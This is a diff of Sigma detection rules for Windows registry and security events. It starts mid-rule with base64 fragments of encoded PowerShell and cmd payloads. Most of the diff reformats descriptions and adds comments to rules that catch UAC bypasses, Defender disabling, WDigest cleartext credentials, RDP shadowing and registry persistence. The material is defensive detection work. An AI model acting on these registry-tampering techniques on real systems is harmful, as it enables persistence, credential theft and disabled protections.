SUVY + - SQBFAF + - SQBuAH + - cwBhA + - aWV4 + - aQBlA + - R2V0 + - dmFy + - dgBhA + - dXNpbm + - H4sIA + - Y21k + - cABhAH + - Qzpc + - Yzpc condition: registry_set and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/registry/registry_set/registry_set_system_lsa_nolmhash.yml b/sigma/builtin/registry/registry_set/registry_set_system_lsa_nolmhash.yml index 0bf1b91dc..31575faac 100644 --- a/sigma/builtin/registry/registry_set/registry_set_system_lsa_nolmhash.yml +++ b/sigma/builtin/registry/registry_set/registry_set_system_lsa_nolmhash.yml @@ -1,16 +1,12 @@ title: Enable LM Hash Storage id: c420410f-c2d8-4010-856b-dffe21866437 related: - - id: 98dedfdd-8333-49d4-9f23-d7018cccae53 - type: similar + - id: 98dedfdd-8333-49d4-9f23-d7018cccae53 # process_creation + type: similar status: experimental -description: 'Detects changes to the "NoLMHash" registry value in order to allow Windows - to store LM Hashes. - - By setting this registry value to "0" (DWORD), Windows will be allowed to store - a LAN manager hash of your password in Active Directory and local SAM databases. - - ' +description: | + Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. + By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. references: - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password diff --git a/sigma/builtin/registry/registry_set/registry_set_taskcache_entry.yml b/sigma/builtin/registry/registry_set/registry_set_taskcache_entry.yml index 5fd997499..b4e026e71 100644 --- a/sigma/builtin/registry/registry_set/registry_set_taskcache_entry.yml +++ b/sigma/builtin/registry/registry_set/registry_set_taskcache_entry.yml @@ -1,8 +1,7 @@ title: Scheduled TaskCache Change by Uncommon Program id: 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d status: experimental -description: Monitor the creation of a new key under 'TaskCache' when a new scheduled - task is registered by a process that is not svchost.exe, which is suspicious +description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://labs.f-secure.com/blog/scheduled-task-tampering/ @@ -37,8 +36,7 @@ detection: ProcessName|endswith: \ngen.exe ObjectName|contains: - \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129} - - \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET - Framework\.NET Framework NGEN + - \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET Framework\.NET Framework NGEN filter_office_click_to_run: ProcessName: - C:\Program Files\Microsoft Office\root\Integration\Integrator.exe @@ -51,8 +49,7 @@ detection: - C:\Program Files\Dropbox\Update\DropboxUpdate.exe filter_explorer: ProcessName: C:\Windows\explorer.exe - ObjectName|contains: \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\PLA\Server - Manager Performance Monitor\ + ObjectName|contains: \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\PLA\Server Manager Performance Monitor\ filter_system: ProcessName: System condition: registry_set and (selection and not 1 of filter*) diff --git a/sigma/builtin/registry/registry_set/registry_set_telemetry_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_telemetry_persistence.yml index 97b060778..88bbc92ed 100644 --- a/sigma/builtin/registry/registry_set/registry_set_telemetry_persistence.yml +++ b/sigma/builtin/registry/registry_set/registry_set_telemetry_persistence.yml @@ -1,22 +1,14 @@ title: Potential Registry Persistence Attempt Via Windows Telemetry id: 73a883d0-0348-4be4-a8d8-51031c2564f8 related: - - id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 - type: obsoletes + - id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 + type: obsoletes status: test -description: 'Detects potential persistence behavior using the windows telemetry registry - key. - - Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety - of commands and perform the actual telemetry collections. - - This binary was created to be easily extensible, and to that end, it relies on - the registry to instruct on which commands to run. - - The problem is, it will run any arbitrary command without restriction of location - or type. - - ' +description: | + Detects potential persistence behavior using the windows telemetry registry key. + Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. + This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. + The problem is, it will run any arbitrary command without restriction of location or type. references: - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ author: Lednyov Alexey, oscd.community, Sreeman @@ -28,8 +20,7 @@ tags: logsource: category: registry_set product: windows - definition: 'Requirements: Sysmon config that monitors \SOFTWARE\Microsoft\Windows - NT\CurrentVersion\AppCompatFlags\TelemetryController subkey of the HKLM hives' + definition: 'Requirements: Sysmon config that monitors \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController subkey of the HKLM hives' detection: registry_set: EventID: 4657 diff --git a/sigma/builtin/registry/registry_set/registry_set_terminal_server_suspicious.yml b/sigma/builtin/registry/registry_set/registry_set_terminal_server_suspicious.yml index 958ae0717..e19e59643 100644 --- a/sigma/builtin/registry/registry_set/registry_set_terminal_server_suspicious.yml +++ b/sigma/builtin/registry/registry_set/registry_set_terminal_server_suspicious.yml @@ -1,25 +1,21 @@ title: RDP Sensitive Settings Changed to Zero id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b related: - - id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c - type: similar + - id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c + type: similar status: test -description: 'Detects tampering of RDP Terminal Service/Server sensitive settings. - - Such as allowing unauthorized users access to a system via the ''fAllowUnsolicited'' - or enabling RDP via ''fDenyTSConnections'', etc. - - ' +description: | + Detects tampering of RDP Terminal Service/Server sensitive settings. + Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc. references: - - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html - - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ - - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 + - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the "ServiceDll" key + - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique + - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ - - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ - - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services -author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine - Bencherchali + - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contain description for most of the keys mentioned here (check it out if you want more information + - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contain description for most of the keys mentioned here (check it out if you want more information) +author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali date: 2022/09/29 modified: 2022/11/26 tags: @@ -41,7 +37,6 @@ detection: NewValue: DWORD (0x00000000) condition: registry_set and selection falsepositives: - - Some of the keys mentioned here could be modified by an administrator while - setting group policy (it should be investigated either way) + - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_terminal_server_tampering.yml b/sigma/builtin/registry/registry_set/registry_set_terminal_server_tampering.yml index 9f097ae30..00fc58c6e 100644 --- a/sigma/builtin/registry/registry_set/registry_set_terminal_server_tampering.yml +++ b/sigma/builtin/registry/registry_set/registry_set_terminal_server_tampering.yml @@ -1,29 +1,25 @@ title: RDP Sensitive Settings Changed id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c related: - - id: 171b67e1-74b4-460e-8d55-b331f3e32d67 - type: obsoletes - - id: 41904ebe-d56c-4904-b9ad-7a77bdf154b3 - type: obsoletes - - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b - type: similar + - id: 171b67e1-74b4-460e-8d55-b331f3e32d67 + type: obsoletes + - id: 41904ebe-d56c-4904-b9ad-7a77bdf154b3 + type: obsoletes + - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b + type: similar status: test -description: 'Detects tampering of RDP Terminal Service/Server sensitive settings. - - Such as allowing unauthorized users access to a system via the ''fAllowUnsolicited'' - or enabling RDP via ''fDenyTSConnections''...etc - - ' +description: | + Detects tampering of RDP Terminal Service/Server sensitive settings. + Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc references: - - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html - - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ - - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 + - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the "ServiceDll" key + - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique + - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ - - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ - - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services -author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine - Bencherchali + - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contain description for most of the keys mentioned here (check it out if you want more information + - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contain description for most of the keys mentioned here (check it out if you want more information) +author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali date: 2022/08/06 modified: 2023/08/17 tags: @@ -43,10 +39,10 @@ detection: - \Control\Terminal Server\ ObjectName|endswith: \Shadow NewValue: - - DWORD (0x00000001) - - DWORD (0x00000002) - - DWORD (0x00000003) - - DWORD (0x00000004) + - DWORD (0x00000001) # Full Control with user’s permission + - DWORD (0x00000002) # Full Control without user’s permission + - DWORD (0x00000003) # View Session with user’s permission + - DWORD (0x00000004) # View Session without user’s permission selection_terminal_services_key: ObjectName|contains: - \Control\Terminal Server\ @@ -57,15 +53,14 @@ detection: - \fAllowUnsolicitedFullControl NewValue: DWORD (0x00000001) selection_tamper_only: + # Any changes to these keys should be suspicious and looked at ObjectName|contains: - \services\TermService\Parameters\ServiceDll - \Control\Terminal Server\WinStations\RDP-Tcp\InitialProgram - \Control\Terminal Server\InitialProgram - SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\InitialProgram - condition: registry_set and (selection_shadow or (selection_terminal_services_key - and selection_terminal_services_values) or selection_tamper_only) + condition: registry_set and (selection_shadow or (selection_terminal_services_key and selection_terminal_services_values) or selection_tamper_only) falsepositives: - - Some of the keys mentioned here could be modified by an administrator while - setting group policy (it should be investigated either way) + - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_timeproviders_dllname.yml b/sigma/builtin/registry/registry_set/registry_set_timeproviders_dllname.yml index 01779d888..0e977b0bf 100644 --- a/sigma/builtin/registry/registry_set/registry_set_timeproviders_dllname.yml +++ b/sigma/builtin/registry/registry_set/registry_set_timeproviders_dllname.yml @@ -1,14 +1,10 @@ title: Set TimeProviders DllName id: e88a6ddc-74f7-463b-9b26-f69fc0d2ce85 status: experimental -description: 'Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. - +description: | + Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. - - The Windows Time service (W32Time) enables time synchronization across and within - domains. - - ' + The Windows Time service (W32Time) enables time synchronization across and within domains. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml b/sigma/builtin/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml index 3b7f94688..259f68c83 100644 --- a/sigma/builtin/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml +++ b/sigma/builtin/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml @@ -1,8 +1,7 @@ title: Old TLS1.0/TLS1.1 Protocol Version Enabled id: 439957a7-ad86-4a8f-9705-a28131c6821b status: experimental -description: Detects applications or users re-enabling old TLS versions by setting - the "Enabled" value to "1" for the "Protocols" registry key. +description: Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key. references: - https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_treatas_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_treatas_persistence.yml index a4745bb60..78152967a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_treatas_persistence.yml +++ b/sigma/builtin/registry/registry_set/registry_set_treatas_persistence.yml @@ -26,8 +26,12 @@ detection: filter_office2: ProcessName: C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe filter_svchost: + # Example of target object by svchost + # TargetObject: HKLM\SOFTWARE\Microsoft\MsixRegistryCompatibility\Package\Microsoft.Paint_11.2208.6.0_x64__8wekyb3d8bbwe\User\SOFTWARE\Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs\(Default) + # TargetObject: HKU\S-1-5-21-1000000000-000000000-000000000-0000_Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs\(Default) ProcessName: C:\Windows\system32\svchost.exe filter_misexec: + # This FP has been seen during installation/updates ProcessName: - C:\Windows\system32\msiexec.exe - C:\Windows\SysWOW64\msiexec.exe diff --git a/sigma/builtin/registry/registry_set/registry_set_turn_on_dev_features.yml b/sigma/builtin/registry/registry_set/registry_set_turn_on_dev_features.yml index 75915d247..73680297d 100644 --- a/sigma/builtin/registry/registry_set/registry_set_turn_on_dev_features.yml +++ b/sigma/builtin/registry/registry_set/registry_set_turn_on_dev_features.yml @@ -1,12 +1,10 @@ title: Potential Signing Bypass Via Windows Developer Features - Registry id: b110ebaf-697f-4da1-afd5-b536fa27a2c1 related: - - id: a383dec4-deec-4e6e-913b-ed9249670848 - type: similar + - id: a383dec4-deec-4e6e-913b-ed9249670848 + type: similar status: experimental -description: Detects when the enablement of developer features such as "Developer - Mode" or "Application Sideloading". Which allows the user to install untrusted - packages. +description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. references: - https://twitter.com/malmoeb/status/1560536653709598721 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ diff --git a/sigma/builtin/registry/registry_set/registry_set_uac_bypass_sdclt.yml b/sigma/builtin/registry/registry_set/registry_set_uac_bypass_sdclt.yml index a0f4efabd..ef1788d66 100644 --- a/sigma/builtin/registry/registry_set/registry_set_uac_bypass_sdclt.yml +++ b/sigma/builtin/registry/registry_set/registry_set_uac_bypass_sdclt.yml @@ -1,8 +1,7 @@ title: UAC Bypass via Sdclt id: 5b872a46-3b90-45c1-8419-f675db8053aa status: experimental -description: Detects the pattern of UAC Bypass using registry key manipulation of - sdclt.exe (e.g. UACMe 53) +description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53) references: - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ - https://github.com/hfiref0x/UACME diff --git a/sigma/builtin/registry/registry_set/registry_set_uac_bypass_winsat.yml b/sigma/builtin/registry/registry_set/registry_set_uac_bypass_winsat.yml index b51601edc..8d15f851a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_uac_bypass_winsat.yml +++ b/sigma/builtin/registry/registry_set/registry_set_uac_bypass_winsat.yml @@ -1,8 +1,7 @@ title: UAC Bypass Abusing Winsat Path Parsing - Registry id: 6597be7b-ac61-4ac8-bef4-d3ec88174853 status: test -description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe - (UACMe 52) +description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_uac_bypass_wmp.yml b/sigma/builtin/registry/registry_set/registry_set_uac_bypass_wmp.yml index 46b3da111..df8044f92 100644 --- a/sigma/builtin/registry/registry_set/registry_set_uac_bypass_wmp.yml +++ b/sigma/builtin/registry/registry_set/registry_set_uac_bypass_wmp.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using Windows Media Player - Registry id: 5f9db380-ea57-4d1e-beab-8a2d33397e93 status: test -description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll - (UACMe 32) +description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -20,8 +19,7 @@ detection: EventID: 4657 Channel: Security selection: - ObjectName|endswith: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility - Assistant\Store\C:\Program Files\Windows Media Player\osk.exe + ObjectName|endswith: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Windows Media Player\osk.exe NewValue: Binary Data condition: registry_set and selection falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_vbs_payload_stored.yml b/sigma/builtin/registry/registry_set/registry_set_vbs_payload_stored.yml index 2dbf558c1..e3e6be287 100644 --- a/sigma/builtin/registry/registry_set/registry_set_vbs_payload_stored.yml +++ b/sigma/builtin/registry/registry_set/registry_set_vbs_payload_stored.yml @@ -1,8 +1,7 @@ title: VBScript Payload Stored in Registry id: 46490193-1b22-4c29-bdd6-5bf63907216f status: experimental -description: Detects VBScript content stored into registry keys as seen being used - by UNC2452 group +description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_wab_dllpath_reg_change.yml b/sigma/builtin/registry/registry_set/registry_set_wab_dllpath_reg_change.yml index e0215c7c0..899d6d8d5 100644 --- a/sigma/builtin/registry/registry_set/registry_set_wab_dllpath_reg_change.yml +++ b/sigma/builtin/registry/registry_set/registry_set_wab_dllpath_reg_change.yml @@ -1,8 +1,7 @@ title: Execution DLL of Choice Using WAB.EXE id: fc014922-5def-4da9-a0fc-28c973f41bfb status: test -description: This rule detects that the path to the DLL written in the registry is - different from the default one. Launched WAB.exe tries to load the DLL from Registry. +description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry. references: - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml - https://twitter.com/Hexacorn/status/991447379864932352 diff --git a/sigma/builtin/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml b/sigma/builtin/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml index 531e0c7ea..603274988 100644 --- a/sigma/builtin/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml +++ b/sigma/builtin/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml @@ -1,9 +1,7 @@ title: Wdigest Enable UseLogonCredential id: d6a9b252-c666-4de6-8806-5561bbbd3bdc status: test -description: Detects potential malicious modification of the property value of UseLogonCredential - from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable - clear-text credentials +description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials references: - https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html - https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649 diff --git a/sigma/builtin/registry/registry_set/registry_set_windows_defender_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_windows_defender_tamper.yml index 6d94d8a68..ea16c72ac 100644 --- a/sigma/builtin/registry/registry_set/registry_set_windows_defender_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_windows_defender_tamper.yml @@ -1,13 +1,12 @@ title: Disable Windows Defender Functionalities Via Registry Keys id: 0eb46774-f1ab-4a74-8238-1155855f2263 related: - - id: a64e4198-c1c8-46a5-bc9c-324c86455fd4 - type: obsoletes - - id: fd115e64-97c7-491f-951c-fc8da7e042fa - type: obsoletes + - id: a64e4198-c1c8-46a5-bc9c-324c86455fd4 + type: obsoletes + - id: fd115e64-97c7-491f-951c-fc8da7e042fa + type: obsoletes status: experimental -description: Detects when attackers or tools disable Windows Defender functionalities - via the Windows registry +description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry references: - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105 @@ -16,8 +15,7 @@ references: - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html - https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html - https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html -author: "AlertIQ, J\xE1n Tren\u010Dansk\xFD, frack113, Nasreddine Bencherchali, Swachchhanda\ - \ Shrawan Poudel" +author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel date: 2022/08/01 modified: 2023/08/17 tags: diff --git a/sigma/builtin/registry/registry_set/registry_set_winget_admin_settings_tampering.yml b/sigma/builtin/registry/registry_set/registry_set_winget_admin_settings_tampering.yml index 571291a4b..409375bc0 100644 --- a/sigma/builtin/registry/registry_set/registry_set_winget_admin_settings_tampering.yml +++ b/sigma/builtin/registry/registry_set/registry_set_winget_admin_settings_tampering.yml @@ -1,8 +1,7 @@ title: Winget Admin Settings Modification id: 6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236 status: experimental -description: Detects changes to the AppInstaller (winget) admin settings. Such as - enabling local manifest installations or disabling installer hash checks +description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks references: - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget - https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13 @@ -25,7 +24,6 @@ detection: ObjectName|endswith: \LocalState\admin_settings condition: registry_set and selection falsepositives: - - The event doesn't contain information about the type of change. False positives - are expected with legitimate changes + - The event doesn't contain information about the type of change. False positives are expected with legitimate changes level: low ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_winget_enable_local_manifest.yml b/sigma/builtin/registry/registry_set/registry_set_winget_enable_local_manifest.yml index 8f11d91e6..aa0efb7ec 100644 --- a/sigma/builtin/registry/registry_set/registry_set_winget_enable_local_manifest.yml +++ b/sigma/builtin/registry/registry_set/registry_set_winget_enable_local_manifest.yml @@ -1,9 +1,7 @@ title: Enable Local Manifest Installation With Winget id: fa277e82-9b78-42dd-b05c-05555c7b6015 status: experimental -description: Detects changes to the AppInstaller (winget) policy. Specifically the - activation of the local manifest installation, which allows a user to install - new packages via custom manifests. +description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests. references: - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget author: Nasreddine Bencherchali (Nextron Systems) @@ -24,7 +22,6 @@ detection: NewValue: DWORD (0x00000001) condition: registry_set and selection falsepositives: - - Administrators or developers might enable this for testing purposes or to install - custom private packages + - Administrators or developers might enable this for testing purposes or to install custom private packages level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml b/sigma/builtin/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml index 068594733..03d88608d 100644 --- a/sigma/builtin/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml +++ b/sigma/builtin/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml @@ -1,14 +1,10 @@ title: Winlogon AllowMultipleTSSessions Enable id: f7997770-92c3-4ec9-b112-774c4ef96f96 status: experimental -description: 'Detects when the ''AllowMultipleTSSessions'' value is enabled. - +description: | + Detects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. - - This is often used by attacker as a way to connect to an RDP session without disconnecting - the other users - - ' + This is often used by attacker as a way to connect to an RDP session without disconnecting the other users references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_winlogon_notify_key.yml b/sigma/builtin/registry/registry_set/registry_set_winlogon_notify_key.yml index d30081a31..d479c4291 100644 --- a/sigma/builtin/registry/registry_set/registry_set_winlogon_notify_key.yml +++ b/sigma/builtin/registry/registry_set/registry_set_winlogon_notify_key.yml @@ -1,13 +1,9 @@ title: Winlogon Notify Key Logon Persistence id: bbf59793-6efb-4fa1-95ca-a7d288e52c88 status: test -description: 'Adversaries may abuse features of Winlogon to execute DLLs and/or executables - when a user logs in. - - Winlogon.exe is a Windows component responsible for actions at logon/logoff as - well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. - - ' +description: | + Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. + Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell author: frack113 diff --git a/sigma/builtin/security/account_management/win_security_access_token_abuse.yml b/sigma/builtin/security/account_management/win_security_access_token_abuse.yml index e40ec0077..5c6b320f3 100644 --- a/sigma/builtin/security/account_management/win_security_access_token_abuse.yml +++ b/sigma/builtin/security/account_management/win_security_access_token_abuse.yml @@ -1,9 +1,7 @@ title: Potential Access Token Abuse id: 02f7c9c1-1ae8-4c6a-8add-04693807f92f status: experimental -description: Detects potential token impersonation and theft. Example, when using - "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS - flag". +description: Detects potential token impersonation and theft. Example, when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS flag". references: - https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation - https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html @@ -26,7 +24,7 @@ detection: LogonType: 9 LogonProcessName: Advapi AuthenticationPackageName: Negotiate - ImpersonationLevel: '%%1833' + ImpersonationLevel: '%%1833' # Impersonation condition: security and selection falsepositives: - Anti-Virus diff --git a/sigma/builtin/security/account_management/win_security_admin_rdp_login.yml b/sigma/builtin/security/account_management/win_security_admin_rdp_login.yml index 343505341..ad226a67f 100644 --- a/sigma/builtin/security/account_management/win_security_admin_rdp_login.yml +++ b/sigma/builtin/security/account_management/win_security_admin_rdp_login.yml @@ -16,9 +16,7 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Identifiable administrators usernames (pattern or special - unique character. ex: "Admin-*"), internal policy mandating use only as secondary - account' + definition: 'Requirements: Identifiable administrators usernames (pattern or special unique character. ex: "Admin-*"), internal policy mandating use only as secondary account' detection: security: Channel: Security diff --git a/sigma/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml b/sigma/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml index 411ac3b41..bb2ba5c7a 100644 --- a/sigma/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml +++ b/sigma/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml @@ -1,11 +1,10 @@ title: A Member Was Added to a Security-Enabled Global Group id: 